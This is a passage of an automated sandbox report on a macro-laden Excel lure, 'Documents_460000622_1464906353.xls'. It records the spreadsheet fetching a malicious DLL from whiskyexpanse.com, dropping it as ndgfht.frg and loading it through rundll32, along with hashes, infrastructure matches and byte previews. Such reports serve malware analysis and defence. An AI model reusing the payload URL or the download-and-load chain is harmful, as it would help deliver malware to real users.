                                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

Time | Type | Description
18:47:17 | API Interceptor | 26x Sleep call for process: rundll32.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    No context

                                                    Domains

                                                    No context

                                                    ASN

Match | Associated Sample Name / URL | Detection | Context (IP seen)
(The SHA 256 column on the original page is a "Get hash" link; the hash values are not present in this extract.)

CLOUDFLARENETUS
  vniSIKfm4h.dll | malicious | 104.20.184.68
  61mwzdX4GC.dll | malicious | 104.20.185.68
  WbQrxxnmAO.dll | malicious | 104.20.185.68
  msals.pumpl.dll | malicious | 104.20.184.68
  234d9ec1757404f8fd9fbb1089b2e50c08c5119a2c0ab.exe | malicious | 172.67.150.212
  items list.doc | malicious | 172.67.150.212
  Nickha #U0421#U0430ll Notification.mp3.htm | malicious | 172.67.156.94
  SKMC25832100083932157.jar | malicious | 172.67.150.212
  SecuriteInfo.com.Malware.AI.4002960471.16400.exe | malicious | 104.22.18.188
  aunobp.dll | malicious | 104.20.185.68
  StolenImages_Evidence.js | malicious | 172.67.193.97
  Inquiry 040721_pdf.exe | malicious | 104.21.35.249
  SecuriteInfo.com.Artemis34DBCAD2CB5A.27289.exe | malicious | 172.67.188.154
  Invoice copyt2.pps | malicious | 172.67.178.43
  Invoice copy.ppt | malicious | 104.21.35.175
  shipping documents.exe | malicious | 172.67.161.182
  Invoice copy.ppt | malicious | 104.21.35.175
  EMPRESA SUMPEX TRADE.exe | malicious | 104.21.19.200
  46578-TR.exe | malicious | 172.67.160.218
  Yeni siparis _WJO-001, pdf.exe | malicious | 172.67.188.154

AMAZON-02US
  comprobante de pago bancario.exe | malicious | 44.227.76.166
  TACA20210407.PDF.exe | malicious | 3.13.255.157
  shipping documents.exe | malicious | 3.14.206.30
  Export Invoices_&Packing List.exe | malicious | 65.1.51.136
  U49nsX8zQr.exe | malicious | 3.142.167.54
  LGKacQbjeH.exe | malicious | 3.22.15.135
  GvqwXsjgUm.apk | malicious | 65.9.73.55
  GvqwXsjgUm.apk | malicious | 65.9.73.104
  payment.exe | malicious | 52.58.78.16
  BL836477488575.exe | malicious | 3.13.255.157
  SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exe | malicious | 34.240.216.169
  taiwan.exe | malicious | 13.230.203.251
  Order.exe | malicious | 52.58.78.16
  BL84995005038483.exe | malicious | 52.58.78.16
  Certrificate Confirmation.exe | malicious | 3.14.206.30
  PO91361.exe | malicious | 52.58.78.16
  DHL Shipping Documents.exe | malicious | 44.227.76.166
  FARASIS.xlsx | malicious | 52.218.57.50
  document-1251000362.xlsm | malicious | 143.204.3.74
  document-1251000362.xlsm | malicious | 143.204.3.74

These ASN matches only say that other malicious samples talked to the same Cloudflare and AWS address space; they are not shared infrastructure and should not be used as a pivot on their own.

                                                    JA3 Fingerprints

Match (JA3) | Associated Sample Name / URL | Detection | Context (IP seen)
(The SHA 256 column on the original page is a "Get hash" link; the hash values are not present in this extract.)

7dcce5b76c8b17472d024758970a406b (every row below: malicious, context IP 104.21.3.47)
  8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xls
  8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xls
  Invoice copyt2.pps
  Invoice copy.ppt
  Invoice copy.ppt
  Scan emco Bautechni specification.pps
  PRESUPUESTO.xlsx
  Scan emco Bautechni specification.pps
  Notice-039539.xlsm
  document-1245492889.xls
  Notice-039539.xlsm
  PO#070421APRIL-REV.ppt
  document-1251000362.xlsm
  document-1251000362.xlsm
  FARASIS.xlsx
  NEW LEMA PO 652872-21.ppt
  document-1055791644.xls
  final po PP-11164.ppt
  OrderSheet.pps
  document-1848152474.xlsm

eb88d0b3e1961a0562f006e5ce2a0b87 (every row below: malicious, context IP 52.12.4.186)
  document-1774544026.xls
  Sales_Receipt 8723_xls.xls
  Sales_Receipt 5576.xls
  Payment_Receipt 1726.xls
  invoice.xls
  Doc_841213_7440493012242.xls
  sample20210331-01.xls
  Payment_Receipt 4153.xls
  Q60T94coCp.xls
  Payment_Receipt 6364.xls
  Purchase_Order 1440.xls
  document-1223674862.xlsm
  document-585033175.xlsm
  Payment_Receipt_0624.xls
  SecuriteInfo.com.Heur.21995.xls
  sample20210324-01.xls
  OUTSTANDING_INVOICE_Statement_077117.xlsm
  OUTSTANDING_INVOICE_Statement_112488.xlsm
  OUTSTANDING_INVOICE_Statement_655533.xlsm

A JA3 hash fingerprints the TLS client, which inside the sandbox is the Windows HTTP stack of the analysis VM rather than anything specific to this sample, so these matches group samples by client stack plus contacted server. The second list is the stronger lead: twenty other Excel documents, most of them with the same invoice/receipt naming pattern, reached 52.12.4.186 with the same fingerprint.

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                    File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                    Category:dropped
                                                    Size (bytes):58596
                                                    Entropy (8bit):7.995478615012125
                                                    Encrypted:true
                                                    SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                    MD5:61A03D15CF62612F50B74867090DBE79
                                                    SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                    SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                    SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):326
                                                    Entropy (8bit):3.11466556781601
                                                    Encrypted:false
                                                    SSDEEP:6:kKPllkwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:HMwTJrkPlE99SNxAhUe0ht
                                                    MD5:DAE73406F57ACCA13A6BCA741457638D
                                                    SHA1:92EDB28B1A2B8774BB853F3A51BB2E84D1943EDE
                                                    SHA-256:09A4D2C168D63F22CD3514838B2E8F034DB2B2D3F3EBA013789AAAC0AA35F9F8
                                                    SHA-512:A39B85375E1314F9827E3499528C2DF36C73AE6D181CCA529E0CC69C50481CC0848DEC4FD13F07663DAED2A916A23663A460241970DDA07A8BC3529B1A66A4CE
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview: p...... ..........6:.,..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ohior[1].dll
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:downloaded
                                                    Size (bytes):1058304
                                                    Entropy (8bit):6.53535499133489
                                                    Encrypted:false
                                                    SSDEEP:24576:5hHy+lLB10y0hvDP3PnlFnIOAVMeuaBAvRSM4eja:5hJl9N0hrHnlFnIOADAvRYB
                                                    MD5:C5DF0AA6752CBADA9CC1461F1AE6B64C
                                                    SHA1:17C84C667875594B0285B7412D0BE37FD05CD504
                                                    SHA-256:997428256801049343CE5926CE4652FA0D74E4AB6A93C809C8CC385DEC620123
                                                    SHA-512:21E383BFC558F0B05239A00DE59AD99F631226533AFC9D73F251EEA26754936931BF19BE7F9945800702AA4CDB5AFEC503740AA40AD72E9C96FC72E0DB943A7D
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Reputation:low
                                                    IE Cache URL:https://whiskyexpanse.com/ke/ohior.dll
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........E.........E.......E.......E.............................m........6...T......T......T......T......Rich...........PE..L...X.\...........!.....8...........D.......P.......................................=....@.........................`z.......z..d........v.......................k......T...............................@............P..,............................text...C7.......8.................. ..`.rdata..F>...P...@...<..............@..@.data................|..............@....rsrc....v.......x...B..............@..@.reloc...k.......l..................@..B........................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\B3EE0000
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):82208
                                                    Entropy (8bit):7.883359597711546
                                                    Encrypted:false
                                                    SSDEEP:1536:yaC1JJ7BoQHbAr6AeW1eYbWZwHYvTS1Ru0qyCfQijWGHpM1Q:yaCnJqr6cbWZw4bSjveQijW2pM1Q
                                                    MD5:6932B145DDB6922457DA77263FD1754E
                                                    SHA1:3D8AB07403F7EDB6B309C13D7F87B2DBB4B58C01
                                                    SHA-256:48910B4E3DDAAE28D6C18E6F812D95019A41B7F3FF6D5336FA2CB96F04849670
                                                    SHA-512:AE33AB7EB2727286E24E77760F41CC52C8496366E1101368CE34A568C6589033C183711595E66F67CC2AA759E266386B44592287E35DC0178482F9A73A109E71
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview: .U]O.0.}.....uJ\....)..{.$....Mb._....~.N. *M#.K>.{.=v....V... ...Y. ..n.4mM....?H."3.)k.&[..r....~. ..6.&]..'..w.Y....3...E|.-u.oX..|.....&.1. ..oh...U...gZR...KT5.:..8=.XK3B0..,bk.....6.. ,..(........ZU.K... F.".....q.*.2....A..hB.........t.....C.y..k......K..-..it...>[.Y[....Iv.PB.AU.J3..ak.8.yQx.)#....(.n..+.:.'td.s..{...Ks~B..@....D......-.../..pB/s..Pt..c..].@h?]....:.g.I..=|..].c........a../...B.}v.J.=#f.|.Q.C:P....4.`.........PK..........!.!..A............[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Temp\CabD146.tmp
                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                    File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                    Category:dropped
                                                    Size (bytes):58596
                                                    Entropy (8bit):7.995478615012125
                                                    Encrypted:true
                                                    SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                    MD5:61A03D15CF62612F50B74867090DBE79
                                                    SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                    SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                    SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                    C:\Users\user\AppData\Local\Temp\TarD147.tmp
                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):152788
                                                    Entropy (8bit):6.309740459389463
                                                    Encrypted:false
                                                    SSDEEP:1536:TIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlMGGv:TNqccCymfdmoku2DMykMnNGG0
                                                    MD5:4E0487E929ADBBA279FD752E7FB9A5C4
                                                    SHA1:2497E03F42D2CBB4F4989E87E541B5BB27643536
                                                    SHA-256:AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
                                                    SHA-512:787CBC262570A4FA23FD9C2BA6DA7B0D17609C67C3FD568246F9BEF2A138FA4EBCE2D76D7FD06C3C342B11D6D9BCD875D88C3DC450AE41441B6085B2E5D48C5A
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........|h....210303062855Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Thu Apr 8 00:46:43 2021, atime=Thu Apr 8 00:46:43 2021, length=8192, window=hide
                                                    Category:dropped
                                                    Size (bytes):867
                                                    Entropy (8bit):4.474905640580116
                                                    Encrypted:false
                                                    SSDEEP:12:85QPLgXg/XAlCPCHaXtB8XzB/pUX+WnicvbCbDtZ3YilMMEpxRljKvUTdJP9TdJ2:85Y/XTd6jYYeyDv3qdrNru/
                                                    MD5:951A0E0CB8606EEF33219F64F47BDA04
                                                    SHA1:99E33BDC3EFDFD8E507BACC21FD736459F072583
                                                    SHA-256:F7B98730EF7D1FA92877BF3343D3031272AC398E2351DC23A28918D1A671C159
                                                    SHA-512:0AE4233FE581EB8F4D1EF632BB8A4CAD166FFB65B47889F796C6EFA92168037DEADB08AAD6D82AA0DC5861E186AEE620B9990758E515D89FEF8674F215F1D588
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview: L..................F...........7G..+.1..,..+.1..,... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\367706\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......367706..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Documents_460000622_1464906353.LNK
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Thu Apr 8 00:46:43 2021, atime=Thu Apr 8 00:46:43 2021, length=115712, window=hide
                                                    Category:dropped
                                                    Size (bytes):2228
                                                    Entropy (8bit):4.516452407405915
                                                    Encrypted:false
                                                    SSDEEP:48:8v/XT0jFQaP1d+8dQh2v/XT0jFQaP1d+8dQ/:8v/XojFQUThdQh2v/XojFQUThdQ/
                                                    MD5:90FB6C5F59725EA0D24D18D091040BBC
                                                    SHA1:004673E5C653BADB46406B4C5D5DD246614A8D0A
                                                    SHA-256:AECEB49FB09A71238F3153457F683A2821D5B598F3000C3B04B0287125B1A6E5
                                                    SHA-512:68D91C78D7848FD7ACF3CD96FE82D6CC7141D5BF0369FE7597AFDB5B2215FFF22B8B7167AC66ECCEBC009F7D30FCE26DA811D6C2B455B4D7DC42E2288D397CEA
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview: L..................F.... ....M...{..+.1..,...p=..,...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..t...R.. .DOCUME~1.XLS..r.......Q.y.Q.y*...8.....................D.o.c.u.m.e.n.t.s._.4.6.0.0.0.0.6.2.2._.1.4.6.4.9.0.6.3.5.3...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\367706\Users.user\Desktop\Documents_460000622_1464906353.xls.9.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.o.c.u.m.e.n.t.s._.4.6.0.0.0.0.6.2.2._.1.4.6.4.9.0.6.3.5.3...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.
                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):143
                                                    Entropy (8bit):4.652162523364624
                                                    Encrypted:false
                                                    SSDEEP:3:oyBVomMU9RTDXvbkTGXC5S/9RTDXvbkTGXCmMU9RTDXvbkTGXCv:dj6C1n7ASl1n7UC1n7s
                                                    MD5:A5C1694C63A4C40F758FAC46C375CFC4
                                                    SHA1:09CDCEEAAD5508225FFACCD2F7C99CEC1A5E85EB
                                                    SHA-256:21350610F2A79F94FC49E80087B5F2105A57A71DD2781532E08CB037A1D20D09
                                                    SHA-512:22A7F91BA27C4C46483F134973FE8D2E2607A634AA8C688C3BD9C04C3089744D8F161268214A7F0057AABDB310194C7A18664B1A293E68D907E119BBDED906C0
                                                    Malicious:false
                                                    Preview: Desktop.LNK=0..[xls]..Documents_460000622_1464906353.LNK=0..Documents_460000622_1464906353.LNK=0..[xls]..Documents_460000622_1464906353.LNK=0..
                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\4MFCXH41.txt
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:ASCII text
                                                    Category:downloaded
                                                    Size (bytes):118
                                                    Entropy (8bit):4.5708003640240715
                                                    Encrypted:false
                                                    SSDEEP:3:GmM/OeByDE11R1UTpI96OcAdV1uGTKvcSNzivVddw9QzS5/:XM/w8qTpQd2GTlLVddAoS5/
                                                    MD5:F081DDF03B7C946C0CC4C88EE9401E65
                                                    SHA1:E484164F0407597634D03904FBE7196F0E8308EB
                                                    SHA-256:AA4FF36CF14812E6C35F2C5BC766F2B43C6AE93008B622CAD49E72B617300023
                                                    SHA-512:2084C0A9BECFD190009DA633239F7FFBF1B3A031AF40C353B7E081D0C6EBC119BA4A510A073F52B76664C5908E3BBE4FC59212D0FC43392BCC5389F27406F8D0
                                                    Malicious:false
                                                    IE Cache URL:whiskyexpanse.com/
                                                    Preview: __cfduid.d12fd379ff8b296fa7718ea14c16458e21617814039.whiskyexpanse.com/.9728.2763359616.30884704.132854913.30878745.*.
                                                    C:\Users\user\Desktop\54EE0000
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:Applesoft BASIC program data, first line number 16
                                                    Category:dropped
                                                    Size (bytes):164316
                                                    Entropy (8bit):6.404543028003528
                                                    Encrypted:false
                                                    SSDEEP:3072:eF8rmdAItyzElBIL6lECbgBGGP5xLm7Tjw5bSjze2iNW2MmtJI7QExMmtiEUEoFG:48rmdAItyzElBIL6lECbgBvP5Nm7Tjwc
                                                    MD5:45F873A63562D99B6CCC3CCA80975936
                                                    SHA1:C84FC25F4EE80B0C195F5C710FDBAD7B65070EFE
                                                    SHA-256:D9F09747AC993C5DF93BE887764D79C2456C67AAD6B7FA078C9DF0A471319C34
                                                    SHA-512:38689D95BEDE8C9D436189EADBBD6E96F94FB5AAEFADA553188500E2BD08713280E93AD0DDE20C2991432F3B99D50CC4244B3E9C9EB336B0DD062F87865BD149
                                                    Malicious:false
                                                    Preview: ........g2..........................\.p....user B.....a.........=...............................................=.....i..9..8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...@...8...........C.a.l.i.b.r.i.1...@...............C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...........
                                                    C:\Users\user\ndgfht.frg
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1058304
                                                    Entropy (8bit):6.53535499133489
                                                    Encrypted:false
                                                    SSDEEP:24576:5hHy+lLB10y0hvDP3PnlFnIOAVMeuaBAvRSM4eja:5hJl9N0hrHnlFnIOADAvRYB
                                                    MD5:C5DF0AA6752CBADA9CC1461F1AE6B64C
                                                    SHA1:17C84C667875594B0285B7412D0BE37FD05CD504
                                                    SHA-256:997428256801049343CE5926CE4652FA0D74E4AB6A93C809C8CC385DEC620123
                                                    SHA-512:21E383BFC558F0B05239A00DE59AD99F631226533AFC9D73F251EEA26754936931BF19BE7F9945800702AA4CDB5AFEC503740AA40AD72E9C96FC72E0DB943A7D
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........E.........E.......E.......E.............................m........6...T......T......T......T......Rich...........PE..L...X.\...........!.....8...........D.......P.......................................=....@.........................`z.......z..d........v.......................k......T...............................@............P..,............................text...C7.......8.................. ..`.rdata..F>...P...@...<..............@..@.data................|..............@....rsrc....v.......x...B..............@..@.reloc...k.......l..................@..B........................................................................................................................................................................................................................................................................................................

                                                    Static File Info

                                                    General

                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Last Saved By: Windows User, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Apr 7 13:38:33 2021, Security: 0
                                                    Entropy (8bit):3.202085554218189
                                                    TrID:
                                                    • Microsoft Excel sheet (30009/1) 78.94%
                                                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                    File name:Documents_460000622_1464906353.xls
                                                    File size:291840
                                                    MD5:bcd540201ec5e0301816d194bb15ec30
                                                    SHA1:e5ca3f6cbb69736c904ff77f7ab6514fc48153a3
                                                    SHA256:a83ce7af997c7514b9faa386fde353ce094e7ef5bfc31dfb52dc9f5d7cfee43e
                                                    SHA512:51904ad2d3d789b7855b2499e3917a0d8b5ba31acf7120763ef3a10b11855b5312ca92c7f96d0893acd8b014b06510f0ec2c0c72430159575106b2c9dc2645c4
                                                    SSDEEP:6144:46tIrWqoY5O3vuVULCc9u/vRTP8RXToK+dmXaU:JxaU
                                                    File Content Preview:........................>.......................8...........................3...4...5...6...7..................................................................................................................................................................

                                                    File Icon

                                                    Icon Hash:e4eea286a4b4bcb4

                                                    Static OLE Info

                                                    General

                                                    Document Type:OLE
                                                    Number of OLE Files:1

                                                    OLE File "Documents_460000622_1464906353.xls"

                                                    Indicators

                                                    Has Summary Info:True
                                                    Application Name:Microsoft Excel
                                                    Encrypted Document:False
                                                    Contains Word Document Stream:False
                                                    Contains Workbook/Book Stream:True
                                                    Contains PowerPoint Document Stream:False
                                                    Contains Visio Document Stream:False
                                                    Contains ObjectPool Stream:
                                                    Flash Objects Count:
                                                    Contains VBA Macros:True

                                                    Summary

                                                    Code Page:1252
                                                    Last Saved By:Windows User
                                                    Create Time:2006-09-16 00:00:00
                                                    Last Saved Time:2021-04-07 12:38:33
                                                    Creating Application:Microsoft Excel
                                                    Security:0

                                                    Document Summary

                                                    Document Code Page:1252
                                                    Thumbnail Scaling Desired:False
                                                    Contains Dirty Links:False

                                                    Streams

                                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                    General
                                                    Stream Path:\x5DocumentSummaryInformation
                                                    File Type:data
                                                    Stream Size:4096
                                                    Entropy:0.35273196153
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . . . . . . . E x c e l 4 . 0 M a c r o s . . . . . . . . . . . .
